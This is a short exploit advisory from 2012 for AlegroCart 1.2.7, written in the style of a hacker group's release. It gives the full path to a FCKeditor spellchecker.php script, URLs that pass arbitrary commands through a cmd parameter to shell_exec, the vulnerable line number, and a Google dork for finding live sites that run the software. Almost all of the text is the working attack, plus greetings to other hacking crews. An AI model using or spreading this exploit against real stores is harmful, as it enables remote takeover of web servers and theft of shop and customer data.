#### # Exploit Title: AlegroCart <= 1.2.7 (spellchecker.php) Remote Command Execution Vulnerability
# Author: T0x!c
# Date: 22/02/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: intext:" Powered by AlegroCart Your Store Name © 2012"
# Vendor: http://forum.alegrocart.com/viewtopic.php?f=8&t=570
# Version: 1.2.7
# Tested on: [Windows Xp] 
####



# Exploit : admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

http://localhost/Path/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=[your command]
 
http://127.0.0.1/Path/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=[your command]


 shell_exec( $cmd )) {
 
line : 102


=================================**Algerians Hackers**=======================================
 # Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Kader11000 * Kalashinkov * Over-x
 (exploit-id.com) , (1337day.com) , (h4ckforu.com) , (alboraaq.com)  (Dz-Team.biz) =============================================================================================